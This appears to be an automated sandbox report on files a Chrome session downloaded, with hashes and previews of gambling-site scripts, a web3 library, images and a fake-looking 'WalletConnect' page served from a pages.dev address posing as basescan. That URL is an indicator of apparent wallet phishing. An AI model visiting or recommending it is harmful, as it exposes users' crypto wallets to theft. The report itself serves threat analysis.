                                                                                                                                                                                                                                              Entropy (8bit):4.736099746556875
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:qEbNPL5YHk2FLpTOH8jGz28RIVbZyckiqmXEIAgGHJBxaXF/F3Ywn:qez5YHkELpe8ji28R8Z1kiTEIABHrxav
                                                                                                                                                                                                                                              MD5:749E53C79DEDCB28DDA8AE8EC85380F8
                                                                                                                                                                                                                                              SHA1:89F23C075D8B1D707F1C09DF37D8079CE874EE57
                                                                                                                                                                                                                                              SHA-256:12957FDC2D6EAD0DD97DB32710069589D1FA6632C355A6DD8F54FF6F6A50986F
                                                                                                                                                                                                                                              SHA-512:0F514A1818253272785B87C623D9B5013AD1D0164CB51E4809F278D114D3C3121284C376EBDA1E0E878BBE64BAF229F08D2CD88EE8E7F8724CACD4072498A2A7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var o=(n=>(n.Money="Money",n.LuckySpin="LuckySpin",n.FreeSpin="FreeSpin",n.Lottery="Lottery",n.Deposit="DepositBonus",n))(o||{});export{o as R};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1922)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3993
                                                                                                                                                                                                                                              Entropy (8bit):5.258539030573499
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:94E7BTGIapybNs1LIMV7w5zc91MXlGw5zqnfkLB1h2O/pGCpKNsuWQOHmVztQPQS:vTccb61sKic1oC8LB1xbmVuPQ79dMD
                                                                                                                                                                                                                                              MD5:AD352C11E662D317BACCDF2F412340E5
                                                                                                                                                                                                                                              SHA1:855D71B0AD2B7FB4FDA1636FFB76AEADACA86F2D
                                                                                                                                                                                                                                              SHA-256:78710B30AC33B793F289F5C34F94D9F55A95A22676EE29DC66372B6B76BD1D03
                                                                                                                                                                                                                                              SHA-512:3F4BC575C0BB6D71B8286EF16E5D2400ECA3FD542366937B56D8A1D01A10378A64692F2238EBE0D9EAEAB9F29CA8486CBDB87F339166DD6AB9BB79BC13D0B54F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore={init:function(){$(document).ready(function(e){$('[data-toggle="tooltip"]').tooltip({trigger:'hover'});$('[data-toggle="popover"]').popover({trigger:'hover'});$.HSCore.helpers.darkMode();$.HSCore.helpers.detectIE();$.HSCore.helpers.bootstrapNavOptions.init();});},components:{},helpers:{Math:{getRandomValueFromRange:function(startPoint,endPoint,fixed){var fixedInner=fixed?fixed:false;Math.random();return fixedInner?(Math.random()*(endPoint-startPoint)+startPoint):(Math.floor(Math.random()*(endPoint-startPoint+1))+startPoint);}},darkMode:function(){$('#darkModaBtn').on('click',function(){$('body').toggleClass('dark-mode');if($('body').hasClass('dark-mode')){writeCookie("displaymode","dark");$('#darkModaBtnIcon').toggleClass('fa-moon fa-sun');$('#logo-header').attr('src','/images/logo-white.svg?v=0.0.4');window.mode='dark';$("iframe").each(function(){var src=$(this).contents().find('body');src.addClass('dark-mode');src.attr('style','background: #112641
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2811)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2812
                                                                                                                                                                                                                                              Entropy (8bit):5.1504442433530855
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:zXi5WPeo9WF3olW6oJWSogWWonW8Io+EWttopfW+XomWWoLW93oJWYqolWAolWNS:zne5KiDJxIdXrDvoz2Jz1XkGRvctRnmv
                                                                                                                                                                                                                                              MD5:39DBFED5D42470AA3030F4ACAF6CF64E
                                                                                                                                                                                                                                              SHA1:282A155C39570CAE5CD573EFE31AF34A2EE62069
                                                                                                                                                                                                                                              SHA-256:17043CF2159DAE3A8FA8A87E6839000EF45211BD71D8015C19F53931C687CB2A
                                                                                                                                                                                                                                              SHA-512:01A4760E93860860C60A666C151AD1C974A39F372E70A7F80ED2E88E577C31CD784AEEA44C48D97F9E65609D89E51D2D165029DD05BB500B53A34D196E729497
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{a4 as t,a5 as _}from"./manifest-51a3674f.js";const{t:i,Trans:n}=t(Object.assign({"../locales/ar-SA/index.json":()=>_(()=>import("./index-1d0339a0.js"),[]).then(e=>e.default),"../locales/bn-BD/index.json":()=>_(()=>import("./index-9ef743e1.js"),[]).then(e=>e.default),"../locales/de-DE/index.json":()=>_(()=>import("./index-497db49b.js"),[]).then(e=>e.default),"../locales/en-IN/index.json":()=>_(()=>import("./index-ca834a8e.js"),[]).then(e=>e.default),"../locales/en-US/index.json":()=>_(()=>import("./index-c45e23bc.js"),[]).then(e=>e.default),"../locales/es-ES/index.json":()=>_(()=>import("./index-e8926bf8.js"),[]).then(e=>e.default),"../locales/fa-IR/index.json":()=>_(()=>import("./index-76a8b653.js"),[]).then(e=>e.default),"../locales/fi-FI/index.json":()=>_(()=>import("./index-e25014bf.js"),[]).then(e=>e.default),"../locales/fil-PH/index.json":()=>_(()=>import("./index-8bdbb9bf.js"),[]).then(e=>e.default),"../locales/fr-FR/index.json":()=>_(()=>import("./index-9baa4258.js"),[]).
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (890)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):891
                                                                                                                                                                                                                                              Entropy (8bit):5.199036499124419
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:jXqmOloVEnLH/IoP/IISgAjElm6lZUvwnKM+zNNMk+NNMku8AwkAw3Aw+BAChMzX:iaVEDfPWAtv9nuRRqRywJwwwH/X
                                                                                                                                                                                                                                              MD5:E4B5AE56B9CE83D0804A4001E8E3FAED
                                                                                                                                                                                                                                              SHA1:1ACEA078CBA5C74FDFB0444821D84DE320FAC445
                                                                                                                                                                                                                                              SHA-256:7DF583FD67B7507222A0429715FC8533E46C96C8AC4ED8F7F19609CA569BF557
                                                                                                                                                                                                                                              SHA-512:E49E266148BB5FD745E240D1FB5D02513F6F948A729309E4E854EE6A4A1C6B37CF40B0C67F3A7F374753992B58DF2341E7DEAF496C09906A1161A29B101076F9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{N as n,h as o}from"./manifest-51a3674f.js";var c=(e=>(e[e.SpinNotificationBlocked=0]="SpinNotificationBlocked",e[e.QuestBonusNotificationBlocked=1]="QuestBonusNotificationBlocked",e[e.Recharge=2]="Recharge",e[e.WeeklyBonus=3]="WeeklyBonus",e[e.MonthlyBonus=4]="MonthlyBonus",e[e.SportWeeklyBonus=5]="SportWeeklyBonus",e))(c||{});class u{constructor(){this.getLevelDesc=l=>n.getLevelInfo(l)}level(l){return n.getUserLevelInfo(l)}featureGating(){return[{feature:0,unlocked:o.vipLevel>=50,unlockedVIPLevel:50},{feature:1,unlocked:o.vipLevel>=50,unlockedVIPLevel:50},{feature:2,unlocked:o.vipLevel>=22,unlockedVIPLevel:22},{feature:3,unlocked:o.vipLevel>=22,unlockedVIPLevel:22},{feature:4,unlocked:o.vipLevel>=22,unlockedVIPLevel:22},{feature:5,unlocked:o.vipLevel>=22,unlockedVIPLevel:22}]}features(l){return this.featureGating().find(t=>t.feature===l)}}const v=new u;export{c as V,v};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 200x267, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):23969
                                                                                                                                                                                                                                              Entropy (8bit):7.914343934778455
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:hYNg7RVHj8aG0Gp8tru9w15/jVygiqOfQGB0AoaKSoLvaakdjoQi/8OaPrO9j/VT:hYyn8aG0U6cwHpafQGB73o7arUoKZVOs
                                                                                                                                                                                                                                              MD5:41866A63B3D5A604BCE5365217B9724E
                                                                                                                                                                                                                                              SHA1:C02EAECA9CE0103EA389298EDDD6D2ED35CEEABE
                                                                                                                                                                                                                                              SHA-256:576EBA535AB2D87F817A54D15241F939A38D914EF46C84FA9E76381B6E01B0F9
                                                                                                                                                                                                                                              SHA-512:3A02AF594AA4D38239DEF9645F254BEAE6A5A695090F428E1A4502C1B5F155A4256EA1858D02BE02273062EF843CD80C9D74D3F9C69CC450C14A3ADDF70AACCA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                                                                              Entropy (8bit):4.842348522336825
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:SSlnnREVPIcVEfL6RfLKqjutJFuJX4M//E+hnEFzSKHrwXZeQMhrvReWDE9jLEUt:90PIufzju74JXZxGzSKLFQKiZN3QsHn
                                                                                                                                                                                                                                              MD5:23DC56CD738A494E5314BB03C12D93A8
                                                                                                                                                                                                                                              SHA1:E8BDD91D626D0A524009690679CFB82E79824FCD
                                                                                                                                                                                                                                              SHA-256:DDF278EDEA22AA7587F1021EF4538459C1500444699835404E81CCB707496D43
                                                                                                                                                                                                                                              SHA-512:74F4FB7148EA1D0ABAEEC58BE285A107D2FD3DAFC0A1FDCD182EDC3EBBB6C1CAB958C8FFFFE9718BB2DF7F7C5ED5BD9E16742C47B5C0CFB1D4728B46411321D6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSFocusState={init:function(){var collection=$('.js-focus-state input:not([type="checkbox"], [type="radio"]), .js-focus-state textarea, .js-focus-state select');if(!collection.length)return;collection.on('focusin',function(){var $this=$(this),$thisParent=$this.closest('.js-focus-state');$thisParent.addClass('u-focus-state');});collection.on('focusout',function(){var $this=$(this),$thisParent=$this.closest('.js-focus-state');$thisParent.removeClass('u-focus-state');});}};})(jQuery);
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (520), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):520
                                                                                                                                                                                                                                              Entropy (8bit):4.597460602499606
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:0kvFrWH0s0s0s0s0s0s0s0s1PAQ2Tm6SfVVVVVVVVmn:0kUAQ2a6Sun
                                                                                                                                                                                                                                              MD5:7A0998D250D87F205461FEE37A16DD73
                                                                                                                                                                                                                                              SHA1:9255FCAF4B1425BA2B8679A369C109F804A8DEA9
                                                                                                                                                                                                                                              SHA-256:C71CD13C789A2B3D7CD301D5B0EC90B5AFAB9F7F0071CAC814C34CB6CFC0382D
                                                                                                                                                                                                                                              SHA-512:88794CDE8437FF536EC80821A9B744CD97BA62AEB1DFEAC0578F252CC447CC949AA2931E4891C85CAA68F341BD652A11C283C76D3AF57D0B6795A9E123EA44D3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISnAEJjjPUVwpqK9cSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SFwlliF59AADj3BIFDRppjN8SBQ09H1M8EhAJQQnSEmcErloSBQ1asdcQEkEJWgTXv1i4Y2QSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBJPCeOnJjUFUj4tEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_w==?alt=proto
                                                                                                                                                                                                                                              Preview:Cr0BCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAApICgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x133, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2492
                                                                                                                                                                                                                                              Entropy (8bit):7.296636337577209
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Ull06uETAk3fXSKVmo8BXnk3CswzEIobY3KG3qb+/el5:U0EqkkA/IwY3ib5
                                                                                                                                                                                                                                              MD5:1A06A9C69CEEDED0567D8234ABB23A41
                                                                                                                                                                                                                                              SHA1:C0313EDE1AC768BBC6E87358342D18F4C9B1F19D
                                                                                                                                                                                                                                              SHA-256:9F9A46381D7D1992294502196559EF8C5C2D3FF9093FD462D5E459D57DA518F0
                                                                                                                                                                                                                                              SHA-512:FBAE871D3F54411FC04672DE88F36FF88CBA9DECA248409F385B49479066C7371D50C50ED291519F139CC9C109265E31F77EFD7BA1C30F6C4E62823D4FF56A8A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\........d.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 387 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):30088
                                                                                                                                                                                                                                              Entropy (8bit):7.926535659040953
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:acc4QgzeV1DNKpI+2JalKcic5Q8h8J5SkN/N4KchqY1NcjMxXBF:urfDNK++DzspN4phC6v
                                                                                                                                                                                                                                              MD5:48F720665C4A5F5945D5FE21E72D9B81
                                                                                                                                                                                                                                              SHA1:008AA31EF6725732E783BCE85076BFB37CC8D5E8
                                                                                                                                                                                                                                              SHA-256:3FF5C584E077109706744D95F983506552C153230052C997CDBCD066039BFC7F
                                                                                                                                                                                                                                              SHA-512:718E1F544C5BF1F36CC7C709ADF6D8F3D193C84CE10B6B42DFB5801385865A8ED0B558656C56EF8B61C7CA389A8373B23545DE8710495A1D743B9E5266458797
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............~.C....PLTE..s..r..q..m..p..i..`..n..g..m..r..r..q..a..p..ocg`..n..p..i..g..l..kjl`............ptm.............................................x......~^..b..h..e..i..j..k~x[..j..o..d..l^bW..n..k]`S..rZ^S..k..l..q..o..qytZ@FF...............=DEzvY..aTWL..dhgS..rjiT..l..o..k..m..h.....f.|\wrX8>A3::5:;5;<6<=6=>7??8??..p..q..r..f..r..r..r..s..s...>GG<CC>DE:AC<DD;BB=AC:CC?BC:DD9<>@HJ;AB8?@=EE5;<:AB@DH;BC:AB@FG:AB;AB9FF:AB<CD:@B;AB:AA<CF:BC:@B;DE:@A;CC:AB:BB;AC9AB;AC:AB;BC:BB:AB:AB8?A;CC:BB:BB:AB:@A9AB<CC:AA:AB:AB9AC:AA:BD:AB:AB:AB:@A<BD:BC9AA;AB:BB;BC:@B9@A:AB:AB:AB;BD=EE;DD......mux...hqs......z...........WZPmkU..p.._..n..pUXL..i..^..g..f..j..iqmW..nsoW..f..c.y\X[R..a..quqXwrY..r..s..r..s.}]..m..r..o..r..y...........................s{~...................tRNS..^.Q4k>I...I..0..fVpr+...z%.Mj..5.]....=XUb|nxut?..].6..;.@....D(@.PTHBc}R.].X.....uiFNQTWY[^x..+....................... "#$&'(*+-./013355789;=>@BCDEFGHJKLMNOPQRRTUVXXYZ\^^`aceJJORdL.R..[.slHS.j..M
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.082642204918865
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:pwJMyiqwJMHDzwZtAV2HKwZlvCmw13LoHw89oE4wHBL3MLEBJz6qE4v:LNwHKAU4r0H9fBLcLE9j
                                                                                                                                                                                                                                              MD5:7FF6101B945EA94B8E05BF165A11B952
                                                                                                                                                                                                                                              SHA1:30B9A3CB59BB261E92E78A695406BF64802A37A0
                                                                                                                                                                                                                                              SHA-256:7B621313FEC0CD0B9B902E566ADD2DEA6A84172BF72892635C6F4234AF039B7E
                                                                                                                                                                                                                                              SHA-512:F8E6C3C0D723F75DD63AC04853BF278E3412E88C5D30ABFD4D06F8827C209408D7B8745312770F5C126CA27ED4DE8AAA577B72D668524F12DE3DBD9FBEBB723E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/discord-3fjpJq_P.js
                                                                                                                                                                                                                                              Preview:const s="/assets/twitter-CjM0oJxu.png",t="/assets/twitter_w-Lq2eUASd.png",n="/assets/tg_channel-BaEz77Ff.png",a="/assets/tg-CdRZIRE6.png",e="/assets/ins-B6hRyGxO.png",c="/assets/ins_w-Cu8q5kE8.png",g="/assets/discord-DzNUvjVK.png";export{t as a,n as b,a as c,c as d,g as e,e as i,s as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65469), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1345891
                                                                                                                                                                                                                                              Entropy (8bit):5.661086821288935
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:saLh8lk8k17/ams0MRV4gIynFQfn/e2Fg:sjk8k17/JMRegIyFwDS
                                                                                                                                                                                                                                              MD5:BC9D6860CB9632A3AE39ADAE49BD7F89
                                                                                                                                                                                                                                              SHA1:4CA0DC8DE4CF3FCC23BB7093C61307EFA11EB0E4
                                                                                                                                                                                                                                              SHA-256:0C7D051AB66A0DDD1A93FC0AAA410AFA2FAF131FB6C1ED7E6BF24E4124496863
                                                                                                                                                                                                                                              SHA-512:46FDEE4A3A0577CEC7C531D9795FE0744CC95F44D75B24D8C402BD2C6E362F43931D068424AF678DB6F56FD15D789440FEBA0136EDDB873F265B0A1BC02D7E78
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*! For license information please see web3.min.js.LICENSE.txt */..!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(self,(()=>(()=>{var e={81645:(e,t,r)=>{"use strict";var n=function(e){var t="function"==typeof Symbol&&Symbol.iterator,r=t&&e[t],n=0;if(r)return r.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")},i=function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.chains=t._getInitializedChains=void 0;var o=i(r(87295)),a=i(r(31227)),s=i(r(40439)),u=i(r(37098)),f=i(r(17687));function c(e){var t,r,i={1:"mainnet",3:"ropsten",4:"rinkeby",42:"kovan",5:"goerli"},c={mainnet:o.default,ropsten:a.default,rinkeby:s.default,kovan:u.default,goerli:f.default
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65426), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):98239
                                                                                                                                                                                                                                              Entropy (8bit):4.826603535592958
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:OEYlulER5ept0S61Ieb36TtXaWsWo5OMkvcBydaiUq:fYlulY1Ieb36TtXaWsWVdaiUq
                                                                                                                                                                                                                                              MD5:0B963AE045CFEAEBF9C9268941BAE839
                                                                                                                                                                                                                                              SHA1:BCFF338C08F4206B80A07187F58AB84162FEC396
                                                                                                                                                                                                                                              SHA-256:65ACDB685C6BE1CBEDE6217B17E9AB630773CAD817E0087601C85E36CE53148C
                                                                                                                                                                                                                                              SHA-512:8DD5AB0F0120CA120D0295D770AF5CAAEF57F50E491707024F711B358F255EE9F6FC9555303067B2207FF3192018FB781D06CFBAC61A7EDCD8DAA5F5B4D14E88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e="Accepted",t="Activate",a="Affiliate",o="Amazing",i="Amount",r="Apply",n="April",s="Archived",l="August",h="Available",c="BONUS",d="Back",u="Basic",m="Bonus",y="Bronze",p="CONGRATULATIONS",f="Casino",g="Claim",w="Claimed",b="Code",_="Commission",v="Confirm",k="Congrats",T="Copied",C="Copy",A="Currency",R="Daily",S="Dashboard",I="Days",N="December",P="Dedicated",V="Denied",W="Deposit",E="Details",x="Diamond",B="Earn",O="Earned",D="Ends",L="Epic",H="February",U="Fee",F="Friends",Y="Game",G="Go",M="Gold",q="History",z="Hourly",j="Hours",$="January",J="July",Q="June",X="LV",K="Level",Z="Link",ee="Locked",te="Lottery",ae="March",oe="May",ie="Mega",re="Minutes",ne="Monthly",se="Name",le="November",he="October",ce="Online",de="Optional",ue="Overview",me="Pending",ye="Platinum",pe="Play",fe="Prize",ge="Promotion",we="Quests",be="Rain",_e="Raining",ve="Rakeback",ke="Reach",Te="Ready",Ce="Recharge",Ae="Redeem",Re="Referral",Se="Referrals",Ie="Reload",Ne="Retry",Pe="Rewarding",Ve="Roll",W
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):567
                                                                                                                                                                                                                                              Entropy (8bit):7.088548650367209
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/7MR8IlgQ9oB9H4f8yE4Koc6IOOBqR30ipvT2t1:z8IL9o4fvE41EOOsJRKL
                                                                                                                                                                                                                                              MD5:16332B8DDAAFB0C692B54118B9EC0E71
                                                                                                                                                                                                                                              SHA1:B5418A315706145D40E76E22CDA8D076EB0329C0
                                                                                                                                                                                                                                              SHA-256:1DF3270A422760D53FE58F7ADA84BC2D0F72B0310DA5D17AF2AB56C8089133F9
                                                                                                                                                                                                                                              SHA-512:A40625BD735EF1ECC2B7D358AACB4595819479F0BED9EB5ABA924A4DD6FBC9DAA32078C86CB210E75FE0FE0B8F62B9D8A87D80B64F2C0D1CC1E9C20349D9F35B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............W.?....PLTE.........................................................---...CBD<;<!!!......```\\\KKK...........iijSSS%%&................................mmnfff]]]))).........................................~~.yyy[[[555545....'.#....tRNS.......[R.S\.......IDAT..m..n.0..P..N....3{'.{..'..]..r..D."...K"..4R.oTM..C..:..i`Y....@p.C...:yhm.o....j.C.......Y......(b8..............K6...DO-.DD.I..i....."..?`.^O.JD:`.~....[4...6.gw.^.X.72}xs..Ee..6.#......qVd..#u..{...w...F........6V.;.M...M...8.!._].?K............a......IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
